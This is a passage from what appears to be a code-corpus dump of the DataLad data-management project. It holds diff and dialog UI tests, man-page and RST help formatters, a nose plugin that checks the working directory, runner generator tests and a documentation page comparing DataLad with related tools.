state='untracked',\n type='directory',\n refds=ds.path,\n # path always comes out a full path inside the queried dataset\n path=apath,\n )\n\n assert_result_count(\n ds.diff(\n recursive=True, result_renderer='disabled'),\n 1,\n path=apath)\n # limiting recursion will exclude this particular path\n assert_result_count(\n ds.diff(\n recursive=True,\n recursion_limit=1, result_renderer='disabled'),\n 0,\n path=apath)\n # negative limit is unlimited limit\n eq_(\n ds.diff(recursive=True, recursion_limit=-1, result_renderer='disabled'),\n ds.diff(recursive=True, result_renderer='disabled')\n )\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_diff_nods(path=None, otherpath=None):\n ds = Dataset(path).create()\n assert_result_count(\n ds.diff(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n status='error',\n message='path not underneath this dataset')\n otherds = Dataset(otherpath).create()\n assert_result_count(\n ds.diff(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n path=otherds.path,\n status='error',\n message=(\n 'dataset containing given paths is not underneath the '\n 'reference dataset %s: %s', ds, otherds.path)\n )\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_rsync_syntax(path=None):\n # three nested datasets\n ds = Dataset(path).create()\n subds = ds.create('sub')\n subsubds = subds.create(Path('subdir', 'deep'))\n justtop = ds.diff(fr=PRE_INIT_COMMIT_SHA, path='sub', result_renderer='disabled')\n # we only get a single result, the subdataset in question\n assert_result_count(justtop, 1)\n assert_result_count(justtop, 1, type='dataset', path=subds.path)\n # now with \"peak inside the dataset\" syntax\n inside = ds.diff(fr=PRE_INIT_COMMIT_SHA, path='sub' + os.sep,\n result_renderer='disabled')\n # we get both subdatasets, but nothing else inside the nested 
one\n assert_result_count(inside, 2, type='dataset')\n assert_result_count(inside, 1, type='dataset', path=subds.path)\n assert_result_count(inside, 1, type='dataset', path=subsubds.path)\n assert_result_count(inside, 0, type='file', parentds=subsubds.path)\n # if we point to the subdir in 'sub' the reporting wrt the subsubds\n # doesn't change. It is merely a path constraint within the queried\n # subds, but because the subsubds is still underneath it, nothing changes\n inside_subdir = ds.diff(\n fr=PRE_INIT_COMMIT_SHA, path=op.join('sub', 'subdir'),\n result_renderer='disabled')\n assert_result_count(inside_subdir, 2, type='dataset')\n assert_result_count(inside_subdir, 1, type='dataset', path=subds.path)\n assert_result_count(inside_subdir, 1, type='dataset', path=subsubds.path)\n assert_result_count(inside_subdir, 0, type='file', parentds=subsubds.path)\n # but the rest is different (e.g. all the stuff in .datalad is gone)\n neq_(inside, inside_subdir)\n # just for completeness, we get more when going full recursive\n rec = ds.diff(fr=PRE_INIT_COMMIT_SHA, recursive=True, path='sub' + os.sep,\n result_renderer='disabled')\n assert(len(inside) < len(rec))\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_nonexistent_ref_unicode(path=None):\n ds = Dataset(path).create()\n assert_result_count(\n ds.diff(fr=\"HEAD\", to=u\"β\", on_failure=\"ignore\", result_renderer='disabled'),\n 1,\n path=ds.path,\n status=\"impossible\")\n\n\n# https://github.com/datalad/datalad/issues/3997\n@with_tempfile(mkdir=True)\ndef test_no_worktree_impact_false_deletions(path=None):\n ds = Dataset(path).create()\n # create a branch that has no new content\n ds.repo.call_git(['checkout', '-b', 'test'])\n # place two successive commits with file additions into the default branch\n ds.repo.call_git(['checkout', DEFAULT_BRANCH])\n (ds.pathobj / 'identical').write_text('should be')\n ds.save()\n (ds.pathobj / 'new').write_text('yes')\n ds.save()\n # now perform a diff for the last commit, there is one file that remained\n # identifical\n ds.repo.call_git(['checkout', 'test'])\n res = ds.diff(fr=DEFAULT_BRANCH + '~1', to=DEFAULT_BRANCH,\n result_renderer='disabled')\n # under no circumstances can there be any reports on deleted files\n # because we never deleted anything\n assert_result_count(res, 0, state='deleted')\n # the identical file must be reported clean\n assert_result_count(\n res,\n 1,\n state='clean',\n path=str(ds.pathobj / 'identical'),\n )\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_fr_none_one_get_content_annexinfo_call(path=None):\n from datalad.support.annexrepo import AnnexRepo\n ds = Dataset(path).create()\n (ds.pathobj / \"foo\").write_text(\"foo\")\n ds.save()\n # get_content_annexinfo() is expensive. 
If fr=None, we should\n # only need to call it once.\n with patch.object(AnnexRepo, \"get_content_annexinfo\") as gca:\n res = ds.diff(fr=None, to=\"HEAD\", annex=\"all\", result_renderer='disabled')\n eq_(gca.call_count, 1)\n" }, { "alpha_fraction": 0.5215922594070435, "alphanum_fraction": 0.5270702242851257, "avg_line_length": 33.12149429321289, "blob_id": "0362fb8fdf1f1e06be1b079aba753111edcac235", "content_id": "04248a33f14db3b3a39e108d4138dccaadb7eefe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10953, "license_type": "permissive", "max_line_length": 91, "num_lines": 321, "path": "/_datalad_build_support/formatters.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport argparse\nimport datetime\nimport os\nimport re\nimport time\nfrom textwrap import wrap\n\n\nclass ManPageFormatter(argparse.HelpFormatter):\n # This code was originally distributed\n # under the same License of Python\n # Copyright (c) 2014 Oz Nahum Tiram <[email protected]>\n def __init__(self,\n prog,\n indent_increment=2,\n max_help_position=4,\n width=1000000,\n section=1,\n ext_sections=None,\n authors=None,\n version=None\n ):\n from datalad import cfg\n super(ManPageFormatter, self).__init__(\n prog,\n indent_increment=indent_increment,\n max_help_position=max_help_position,\n width=width)\n\n self._prog = prog\n self._section = 1\n self._today = datetime.datetime.utcfromtimestamp(\n cfg.obtain('datalad.source.epoch')\n ).strftime('%Y\\\\-%m\\\\-%d')\n self._ext_sections = ext_sections\n self._version = version\n\n def _get_formatter(self, **kwargs):\n return self.formatter_class(prog=self.prog, **kwargs)\n\n def _markup(self, txt):\n return txt.replace('-', '\\\\-')\n\n def _underline(self, string):\n return \"\\\\fI\\\\s-1\" + string + \"\\\\s0\\\\fR\"\n\n def _bold(self, string):\n if not string.strip().startswith('\\\\fB'):\n string = '\\\\fB' + string\n if not string.strip().endswith('\\\\fR'):\n string = string + '\\\\fR'\n return string\n\n def _mk_synopsis(self, parser):\n self.add_usage(parser.usage, parser._actions,\n parser._mutually_exclusive_groups, prefix='')\n usage = self._format_usage(None, parser._actions,\n parser._mutually_exclusive_groups, '')\n # replace too long list of commands with a single placeholder\n usage = re.sub(r'{[^]]*?create,.*?}', ' COMMAND ', usage, flags=re.MULTILINE)\n # take care of proper wrapping\n usage = re.sub(r'\\[([-a-zA-Z0-9]*)\\s([a-zA-Z0-9{}|_]*)\\]', r'[\\1\\~\\2]', usage)\n\n usage = usage.replace('%s ' % self._prog, '')\n usage = '.SH SYNOPSIS\\n.nh\\n.HP\\n\\\\fB%s\\\\fR %s\\n.hy\\n' % (self._markup(self._prog),\n usage)\n return usage\n\n def _mk_title(self, prog):\n name_version = \"{0} {1}\".format(prog, self._version)\n return '.TH \"{0}\" \"{1}\" \"{2}\" \"{3}\"\\n'.format(\n prog, self._section, self._today, name_version)\n\n def _mk_name(self, prog, desc):\n \"\"\"\n this method is in consistent with others ... 
it relies on\n distribution\n \"\"\"\n desc = desc.splitlines()[0] if desc else 'it is in the name'\n # ensure starting lower case\n desc = desc[0].lower() + desc[1:]\n return '.SH NAME\\n%s \\\\- %s\\n' % (self._bold(prog), desc)\n\n def _mk_description(self, parser):\n desc = parser.description\n desc = '\\n'.join(desc.splitlines()[1:])\n if not desc:\n return ''\n desc = desc.replace('\\n\\n', '\\n.PP\\n')\n # sub-section headings\n desc = re.sub(r'^\\*(.*)\\*$', r'.SS \\1', desc, flags=re.MULTILINE)\n # italic commands\n desc = re.sub(r'^ ([-a-z]*)$', r'.TP\\n\\\\fI\\1\\\\fR', desc, flags=re.MULTILINE)\n # deindent body text, leave to troff viewer\n desc = re.sub(r'^ (\\S.*)\\n', '\\\\1\\n', desc, flags=re.MULTILINE)\n # format NOTEs as indented paragraphs\n desc = re.sub(r'^NOTE\\n', '.TP\\nNOTE\\n', desc, flags=re.MULTILINE)\n # deindent indented paragraphs after heading setup\n desc = re.sub(r'^ (.*)$', '\\\\1', desc, flags=re.MULTILINE)\n\n return '.SH DESCRIPTION\\n%s\\n' % self._markup(desc)\n\n def _mk_footer(self, sections):\n if not hasattr(sections, '__iter__'):\n return ''\n\n footer = []\n for section, value in sections.items():\n part = \".SH {}\\n {}\".format(section.upper(), value)\n footer.append(part)\n\n return '\\n'.join(footer)\n\n def format_man_page(self, parser):\n page = []\n page.append(self._mk_title(self._prog))\n page.append(self._mk_name(self._prog, parser.description))\n page.append(self._mk_synopsis(parser))\n page.append(self._mk_description(parser))\n page.append(self._mk_options(parser))\n page.append(self._mk_footer(self._ext_sections))\n\n return ''.join(page)\n\n def _mk_options(self, parser):\n\n formatter = parser._get_formatter()\n\n # positionals, optionals and user-defined groups\n for action_group in parser._action_groups:\n formatter.start_section(None)\n formatter.add_text(None)\n formatter.add_arguments(action_group._group_actions)\n formatter.end_section()\n\n # epilog\n formatter.add_text(parser.epilog)\n\n # determine help from format above\n help = formatter.format_help()\n # add spaces after comma delimiters for easier reformatting\n help = re.sub(r'([a-z]),([a-z])', '\\\\1, \\\\2', help)\n # get proper indentation for argument items\n help = re.sub(r'^ (\\S.*)\\n', '.TP\\n\\\\1\\n', help, flags=re.MULTILINE)\n # deindent body text, leave to troff viewer\n help = re.sub(r'^ (\\S.*)\\n', '\\\\1\\n', help, flags=re.MULTILINE)\n return '.SH OPTIONS\\n' + help\n\n def _format_action_invocation(self, action, doubledash='--'):\n if not action.option_strings:\n metavar, = self._metavar_formatter(action, action.dest)(1)\n return metavar\n\n else:\n parts = []\n\n # if the Optional doesn't take a value, format is:\n # -s, --long\n if action.nargs == 0:\n parts.extend([self._bold(action_str) for action_str in\n action.option_strings])\n\n # if the Optional takes a value, format is:\n # -s ARGS, --long ARGS\n else:\n default = self._underline(action.dest.upper())\n args_string = self._format_args(action, default)\n for option_string in action.option_strings:\n parts.append('%s %s' % (self._bold(option_string),\n args_string))\n\n return ', '.join(p.replace('--', doubledash) for p in parts)\n\n\nclass RSTManPageFormatter(ManPageFormatter):\n def _get_formatter(self, **kwargs):\n return self.formatter_class(prog=self.prog, **kwargs)\n\n def _markup(self, txt):\n # put general tune-ups here\n return txt\n\n def _underline(self, string):\n return \"*{0}*\".format(string)\n\n def _bold(self, string):\n return \"**{0}**\".format(string)\n\n def 
_mk_synopsis(self, parser):\n self.add_usage(parser.usage, parser._actions,\n parser._mutually_exclusive_groups, prefix='')\n usage = self._format_usage(None, parser._actions,\n parser._mutually_exclusive_groups, '')\n\n usage = usage.replace('%s ' % self._prog, '')\n usage = '\\n'.join(wrap(\n usage, break_on_hyphens=False, subsequent_indent=6*' '))\n usage = 'Synopsis\\n--------\\n::\\n\\n %s %s\\n\\n' \\\n % (self._markup(self._prog), usage)\n return usage\n\n def _mk_title(self, prog):\n # and an easy to use reference point\n title = \".. _man_%s:\\n\\n\" % prog.replace(' ', '-')\n title += \"{0}\".format(prog)\n title += '\\n{0}\\n\\n'.format('=' * len(prog))\n return title\n\n def _mk_name(self, prog, desc):\n return ''\n\n def _mk_description(self, parser):\n desc = parser.description\n if not desc:\n return ''\n return 'Description\\n-----------\\n%s\\n' % self._markup(desc)\n\n def _mk_footer(self, sections):\n if not hasattr(sections, '__iter__'):\n return ''\n\n footer = []\n for section, value in sections.items():\n part = \"\\n{0}\\n{1}\\n{2}\\n\".format(\n section,\n '-' * len(section),\n value)\n footer.append(part)\n\n return '\\n'.join(footer)\n\n def _mk_options(self, parser):\n\n # this non-obvious maneuver is really necessary!\n formatter = self.__class__(self._prog)\n\n # positionals, optionals and user-defined groups\n for action_group in parser._action_groups:\n formatter.start_section(None)\n formatter.add_text(None)\n formatter.add_arguments(action_group._group_actions)\n formatter.end_section()\n\n # epilog\n formatter.add_text(parser.epilog)\n\n # determine help from format above\n option_sec = formatter.format_help()\n\n return '\\n\\nOptions\\n-------\\n{0}'.format(option_sec)\n\n def _format_action(self, action):\n # determine the required width and the entry label\n action_header = self._format_action_invocation(action, doubledash='-\\\\-')\n\n if action.help:\n help_text = self._expand_help(action)\n help_lines = self._split_lines(help_text, 80)\n help = ' '.join(help_lines)\n else:\n help = ''\n\n # return a single string\n return '{0}\\n{1}\\n{2}\\n\\n'.format(\n action_header,\n\n '~' * len(action_header),\n help)\n\n\ndef cmdline_example_to_rst(src, out=None, ref=None):\n if out is None:\n from io import StringIO\n out = StringIO()\n\n # place header\n out.write('.. AUTO-GENERATED FILE -- DO NOT EDIT!\\n\\n')\n if ref:\n # place cross-ref target\n out.write('.. {0}:\\n\\n'.format(ref))\n\n # parser status vars\n inexample = False\n incodeblock = False\n\n for line in src:\n if line.startswith('#% EXAMPLE START'):\n inexample = True\n incodeblock = False\n continue\n if not inexample:\n continue\n if line.startswith('#% EXAMPLE END'):\n break\n if not inexample:\n continue\n if line.startswith('#%'):\n incodeblock = not incodeblock\n if incodeblock:\n out.write('\\n.. 
code-block:: sh\\n\\n')\n continue\n if not incodeblock and line.startswith('#'):\n out.write(line[(min(2, len(line) - 1)):])\n continue\n if incodeblock:\n if not line.rstrip().endswith('#% SKIP'):\n out.write(' %s' % line)\n continue\n if not len(line.strip()):\n continue\n else:\n raise RuntimeError(\"this should not happen\")\n\n return out\n" }, { "alpha_fraction": 0.581993579864502, "alphanum_fraction": 0.5824528932571411, "avg_line_length": 22.923076629638672, "blob_id": "f424add999d6bef0997bf6fea838d8b3d405d376", "content_id": "3522511389a0732453362132d5210e34a6d1dfc6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2177, "license_type": "permissive", "max_line_length": 75, "num_lines": 91, "path": "/tools/checkpwd.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nCheck which test did not come back to initial directory and fail right away\nwhen detected.\n\nCould be used as easy as replacement of `python -m nose ...`, with\n`python checkpwd.py --with-checkpwd ...`\n\"\"\"\n\nimport os\nfrom os import path as op\nimport logging\nfrom nose.plugins.base import Plugin\nfrom nose.util import src, tolist\n\nlog = logging.getLogger(__name__)\n\n\ndef getpwd():\n \"\"\"Try to return a CWD without dereferencing possible symlinks\n\n If no PWD found in the env, output of getcwd() is returned\n \"\"\"\n cwd = os.getcwd()\n try:\n env_pwd = os.environ['PWD']\n from datalad.utils import Path\n if Path(env_pwd).resolve() != Path(cwd).resolve():\n # uses os.chdir directly, pwd is not updated\n # could be an option to fail (tp not allow direct chdir)\n return cwd\n return env_pwd\n except KeyError:\n return cwd\n\n\nclass CheckPWD(Plugin):\n \"\"\"\n Activate a coverage report using Ned Batchelder's coverage module.\n \"\"\"\n name = 'checkpwd'\n\n def options(self, parser, env):\n \"\"\"\n Add options to command line.\n \"\"\"\n # throw_exception = True\n super(CheckPWD, self).options(parser, env)\n\n def configure(self, options, conf):\n \"\"\"\n Configure plugin.\n \"\"\"\n super(CheckPWD, self).configure(options, conf)\n self._pwd = getpwd()\n print(\"Initial PWD: %s\" % self._pwd)\n\n def beforeTest(self, *args, **kwargs):\n \"\"\"\n Begin recording coverage information.\n \"\"\"\n assert getpwd() == self._pwd\n\n def afterTest(self, *args, **kwargs):\n \"\"\"\n Stop recording coverage information.\n \"\"\"\n pwd = getpwd()\n # print(\"Checking %s\" % pwd)\n print(\"PWD: %s\" % pwd)\n assert pwd == self._pwd, \\\n \"PWD original:%s current: %s (after %s)\" \\\n % (self._pwd, pwd, args[0])\n\n\ndef test_ok():\n pass\n\n\ndef test_fail():\n os.chdir('/dev')\n\n\ndef test_fail_not_again():\n # will never reach here if test_fail fails\n pass\n\n\nif __name__ == '__main__':\n import nose\n nose.main(addplugins=[CheckPWD()])\n" }, { "alpha_fraction": 0.6901451349258423, "alphanum_fraction": 0.6907563209533691, "avg_line_length": 54, "blob_id": "7f3d287637d8919777d6243f6ee6ef80192328f5", "content_id": "3d2e02158bfbe1e9caf5697e69265b8c8fd9a88f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6545, "license_type": "permissive", "max_line_length": 98, "num_lines": 119, "path": "/docs/source/related.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Delineation from related solutions\n**********************************\n\nTo our knowledge, there is no other 
effort with a scope as broad as DataLad's.\nDataLad aims to unify access to vast arrays of (scientific) data in a domain and\ndata modality agnostic fashion with as few and universally available software\ndependencies as possible.\n\nThe most comparable project regarding the idea of federating access to various\ndata providers is the iRODS_-based `INCF Dataspace`_ project. IRODS is a\npowerful, NSF-supported framework, but it requires non-trivial deployment and\nmanagement procedures. As a representative of *data grid* technology, it is\nmore suitable for an institutional deployment, as data access, authentication,\npermission management, and versioning are complex and not-feasible to be\nperformed directly by researchers. DataLad on the other hand federates\ninstitutionally hosted data, but in addition enables individual researchers and\nsmall labs to contribute datasets to the federation with minimal cost and\nwithout the need for centralized coordination and permission management.\n\n.. _IRODS: https://irods.org\n.. _INCF Dataspace: http://www.incf.org/resources/data-space\n\n\nData catalogs\n=============\n\nExisting data-portals, such as DataDryad_, or domain-specific ones (e.g. `Human\nConnectome`_, OpenfMRI_), concentrate on collecting, cataloging, and making\ndata available. They offer an abstraction from local data management\npeculiarities (organization, updates, sharing). Ad-hoc collections of pointers\nto available data, such as `reddit datasets`_ and `Inside-R datasets`_, do not\nprovide any unified interface to assemble and manage such data. Data portals\ncan be used as seed information and data providers for DataLad. These portals\ncould in turn adopt DataLad to expose readily usable data collections via a\nfederated infrastructure.\n\n.. _Human Connectome: http://www.humanconnectomeproject.org\n.. _OpenfMRI: http://openfmri.org\n.. _DataDryad: http://datadryad.org\n.. _reddit datasets: http://www.reddit.com/r/datasets\n.. _Inside-R datasets: http://www.inside-r.org/howto/finding-data-internet\n\n\nData delivery/management middleware\n===================================\n\nEven though there are projects to manage data directly with dVCS (e.g. Git),\nsuch as the `Rdatasets Git repository`_ this approach does not scale, for example\nto the amount of data typically observed in a scientific context. DataLad\nuses git-annex_ to support managing large amounts of data with Git, while\navoiding the scalability issues of putting data directly into Git repositories.\n\nIn scientific software development, frequently using Git for source code\nmanagement, many projects are also confronted with the problem of managing\nlarge data arrays needed, for example, for software testing. An exemplar\nproject is `ITK Data`_ which is conceptually similar to git-annex: data content\nis referenced by unique keys (checksums), which are made redundantly available\nthrough multiple remote key-store farms and can be obtained using specialized\nfunctionality in the CMake software build system. However, the scope of this\nproject is limited to software QA, and only provides an ad-hoc collection of\nguidelines and supporting scripts.\n\n.. _Rdatasets Git repository: http://github.com/vincentarelbundock/Rdatasets\n.. 
_ITK Data: http://www.itk.org/Wiki/ITK/Git/Develop/Data\n\nThe git-annex website provides a comparison_ of Git-annex to other available\ndistributed data management tools, such as git-media_, git-fat_, and others.\nNone of the alternative frameworks provides all of the features of git-annex,\nsuch as integration with native Git workflows, distributed redundant storage,\nand partial checkouts in one project. Additional features of git-annex which\nare not necessarily needed by DataLad (git-annex assistant, encryption support,\netc.) make it even more appealing for extended coverage of numerous scenarios.\nMoreover, neither of the alternative solutions has already reached a maturity,\navailability, and level of adoption that would be comparable to that of\ngit-annex.\n\n.. _git-annex: http://git-annex.branchable.com\n.. _comparison: http://git-annex.branchable.com/not\n.. _git-media: https://github.com/schacon/git-media\n.. _git-fat: https://github.com/jedbrown/git-fat\n\n.. _chap-git-annex-datalad-comparison:\n\nGit/Git-annex/DataLad\n=====================\n\nAlthough it is possible, and intended, to use DataLad without ever invoking git\nor git-annex commands directly, it is useful to appreciate that DataLad is\nbuild atop of very flexible and powerful tools. Knowing basics of git and\ngit-annex in addition to DataLad helps to not only make better use of\nDataLad but also to enable more advanced and more efficient data management\nscenarios. DataLad makes use of lower-level configuration and data structures\nas much as possible. Consequently, it is possible to manipulate DataLad\ndatasets with low-level tools if needed. Moreover, DataLad datasets are\ncompatible with tools and services designed to work with plain Git repositories,\nsuch as the popular GitHub_ service.\n\n.. _github: https://github.com\n\nTo better illustrate the different scopes, the following table provides an\noverview of the features that are contributed by each software technology\nlayer.\n\n================================================ ============= =============== ==============\nFeature Git Git-annex DataLad\n================================================ ============= =============== ==============\nVersion control (text, code) |tup| |tup| can mix |tup| can mix\nVersion control (binary data) (not advised) |tup| |tup|\nAuto-crawling available resources |tup| RSS feeds |tup| flexible\nUnified dataset handling |tup|\n- recursive operation on datasets |tup|\n- seamless operation across datasets boundaries |tup|\n- meta-data support |tup| per-file |tup|\n- meta-data aggregation |tup| flexible\nUnified authentication interface |tup|\n================================================ ============= =============== ==============\n\n.. |tup| unicode:: U+2713 .. 
check mark\n :trim:\n" }, { "alpha_fraction": 0.5684126019477844, "alphanum_fraction": 0.5762960910797119, "avg_line_length": 34.63809585571289, "blob_id": "d78486de7ec65c7a6c8241f97fd17f1b6abd0125", "content_id": "ecd2b5018d0fb0c6efeff8f9074e40dc6ce33930", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7484, "license_type": "permissive", "max_line_length": 97, "num_lines": 210, "path": "/datalad/ui/tests/test_dialog.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"tests for dialog UI \"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport builtins\nfrom io import StringIO\nfrom unittest.mock import (\n call,\n patch,\n)\n\nimport pytest\n\nfrom datalad.ui.progressbars import progressbars\nfrom datalad.utils import swallow_logs\n\nfrom ...tests.utils_pytest import (\n assert_in,\n assert_not_in,\n assert_raises,\n assert_re_in,\n eq_,\n ok_endswith,\n ok_startswith,\n)\nfrom ..dialog import (\n ConsoleLog,\n DialogUI,\n IPythonUI,\n)\n\n\ndef patch_input(**kwargs):\n \"\"\"A helper to provide mocked cm patching input function which was renamed in PY3\"\"\"\n return patch.object(builtins, 'input', **kwargs)\n\n\ndef patch_getpass(**kwargs):\n return patch('getpass.getpass', **kwargs)\n\n\ndef test_yesno():\n for expected_value, defaults in {True: ('yes', True),\n False: ('no', False)}.items():\n for d in defaults:\n with patch_getpass(return_value=''):\n out = StringIO()\n response = DialogUI(out=out).yesno(\"?\", default=d)\n eq_(response, expected_value)\n\n\ndef test_question_choices():\n\n # TODO: come up with a reusable fixture for testing here\n\n choices = {\n 'a': '[a], b, cc',\n 'b': 'a, [b], cc',\n 'cc': 'a, b, [cc]'\n }\n\n for hidden in (True, False):\n for default_value in ['a', 'b']:\n choices_str = choices[default_value]\n for entered_value, expected_value in [(default_value, default_value),\n ('', default_value),\n ('cc', 'cc')]:\n with patch_getpass(return_value=entered_value) as gpcm:\n out = StringIO()\n response = DialogUI(out=out).question(\n \"prompt\", choices=sorted(choices), default=default_value,\n hidden=hidden\n )\n # .assert_called_once() is not available on older mock's\n # e.g. on 1.3.0 on nd16.04\n eq_(gpcm.call_count, 1) # should have asked only once\n eq_(response, expected_value)\n # getpass doesn't use out -- goes straight to the terminal\n eq_(out.getvalue(), '')\n # TODO: may be test that the prompt was passed as a part of the getpass arg\n #eq_(out.getvalue(), 'prompt (choices: %s): ' % choices_str)\n\n # check some expected exceptions to be thrown\n out = StringIO()\n ui = DialogUI(out=out)\n assert_raises(ValueError, ui.question, \"prompt\", choices=['a'], default='b')\n eq_(out.getvalue(), '')\n\n with patch_getpass(return_value='incorrect'):\n assert_raises(RuntimeError, ui.question, \"prompt\", choices=['a', 'b'])\n assert_re_in(\".*ERROR: .incorrect. 
is not among choices.*\", out.getvalue())\n\n\ndef test_hidden_doubleentry():\n # In above test due to 'choices' there were no double entry for a hidden\n out = StringIO()\n ui = DialogUI(out=out)\n with patch_getpass(return_value='ab') as gpcm:\n response = ui.question(\n \"?\", hidden=True)\n eq_(response, 'ab')\n gpcm.assert_has_calls([call('?: '), call('? (repeat): ')])\n\n # explicitly request no repeats\n with patch_getpass(return_value='ab') as gpcm:\n response = ui.question(\n \"?\", hidden=True, repeat=False)\n eq_(response, 'ab')\n gpcm.assert_has_calls([call('?: ')])\n\n\[email protected](\"backend\", progressbars)\[email protected](\"len\", [0, 4, 10, 1000])\[email protected](\"increment\", [True, False])\ndef test_progress_bar(backend, len, increment):\n # More of smoke testing given various lengths of fill_text\n out = StringIO()\n fill_str = ('123456890' * (len//10))[:len]\n pb = DialogUI(out).get_progressbar(\n 'label', fill_str, total=10, backend=backend)\n pb.start()\n # we can't increment 11 times\n SILENT_BACKENDS = ('annex-remote', 'silent', 'none')\n ONLY_THE_END_BACKENDS = ('log',)\n for x in range(11):\n if not (increment and x == 0):\n # do not increment on 0\n pb.update(x if not increment else 1, increment=increment)\n #out.flush() # needed atm... no longer?\n # Progress bar is having 0.1 sec between updates by default, so\n # we could either sleep:\n #import time; time.sleep(0.1)\n # or just force the refresh\n pb.refresh()\n pstr = out.getvalue()\n if backend not in SILENT_BACKENDS + ONLY_THE_END_BACKENDS: # no str repr\n ok_startswith(pstr.lstrip('\\r'), 'label:')\n assert_re_in(r'.*\\b%d%%.*' % (10*x), pstr)\n if backend == 'progressbar':\n assert_in('ETA', pstr)\n pb.finish()\n output = out.getvalue()\n if backend not in SILENT_BACKENDS:\n # returns back and there is no spurious newline\n if output:\n ok_endswith(output, '\\r')\n\n\ndef test_IPythonUI():\n # largely just smoke tests to see if nothing is horribly bad\n with patch_input(return_value='a'):\n out = StringIO()\n response = IPythonUI(out=out).question(\n \"prompt\", choices=sorted(['b', 'a'])\n )\n eq_(response, 'a')\n eq_(out.getvalue(), 'prompt (choices: a, b): ')\n\n ui = IPythonUI()\n pbar = ui.get_progressbar(total=10)\n assert_in('notebook', str(pbar._tqdm))\n\n\ndef test_silent_question():\n # SilentConsoleLog must not be asked questions.\n # If it is asked, RuntimeError would be thrown with details to help\n # troubleshooting WTF is happening\n from ..dialog import SilentConsoleLog\n ui = SilentConsoleLog()\n with assert_raises(RuntimeError) as cme:\n ui.question(\"could you help me\", title=\"Pretty please\")\n assert_in('question: could you help me. Title: Pretty please.', str(cme.value))\n\n with assert_raises(RuntimeError) as cme:\n ui.question(\"could you help me\", title=\"Pretty please\", choices=['secret1'], hidden=True)\n assert_in('question: could you help me. 
Title: Pretty please.', str(cme.value))\n assert_not_in('secret1', str(cme.value))\n assert_in('not shown', str(cme.value))\n\n # additional kwargs, no title, choices\n with assert_raises(RuntimeError) as cme:\n ui.question(\"q\", choices=['secret1'])\n assert_in('secret1', str(cme.value))\n\n\n@patch(\"datalad.log.is_interactive\", lambda: False)\ndef test_message_pbar_state_logging_is_demoted():\n from datalad.log import LoggerHelper\n\n name = \"dl-test\"\n lgr = LoggerHelper(name).get_initialized_logger()\n ui = ConsoleLog()\n\n with patch(\"datalad.log.lgr\", lgr):\n with swallow_logs(name=name, new_level=20) as cml:\n ui.message(\"testing 0\")\n assert_not_in(\"Clear progress bars\", cml.out)\n assert_not_in(\"Refresh progress bars\", cml.out)\n with swallow_logs(name=name, new_level=5) as cml:\n ui.message(\"testing 1\")\n assert_in(\"Clear progress bars\", cml.out)\n assert_in(\"Refresh progress bars\", cml.out)\n" }, { "alpha_fraction": 0.6129560470581055, "alphanum_fraction": 0.6199719309806824, "avg_line_length": 28.902097702026367, "blob_id": "d6cefeee9ae6baea4f71604807ae6f218699b2f2", "content_id": "937fa0757f548c6cc1a173f065846a5bc2cd6d91", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4276, "license_type": "permissive", "max_line_length": 106, "num_lines": 143, "path": "/datalad/runner/tests/test_generatormixin.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport sys\nfrom queue import Queue\nfrom typing import (\n Any,\n Optional,\n)\n\nfrom datalad.runner.coreprotocols import (\n NoCapture,\n StdOutErrCapture,\n)\nfrom datalad.runner.nonasyncrunner import (\n _ResultGenerator,\n run_command,\n)\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_raises,\n)\n\nfrom ..exception import CommandError\nfrom ..runner import WitlessRunner\nfrom .utils import py2cmd\n\n\nclass TestProtocol(GeneratorMixIn, StdOutErrCapture):\n\n __test__ = False # class is not a class of tests\n\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n StdOutErrCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n self.send_result((fd, data.decode()))\n\n\ndef test_generator_mixin_basic() -> None:\n\n stdin_queue: Queue[Optional[bytes]] = Queue()\n\n i = 0\n for fd, data in run_command([sys.executable, \"-i\", \"-\"], TestProtocol, stdin_queue):\n if i > 10:\n stdin_queue.put(b\"exit(0)\\n\")\n stdin_queue.put(None)\n else:\n stdin_queue.put(f\"print({i}*{i})\\n\".encode())\n i += 1\n\n\ndef test_generator_mixin_runner() -> None:\n\n stdin_queue: Queue[Optional[bytes]] = Queue()\n\n runner = WitlessRunner()\n i = 0\n for fd, data in runner.run(cmd=[sys.executable, \"-i\", \"-\"], 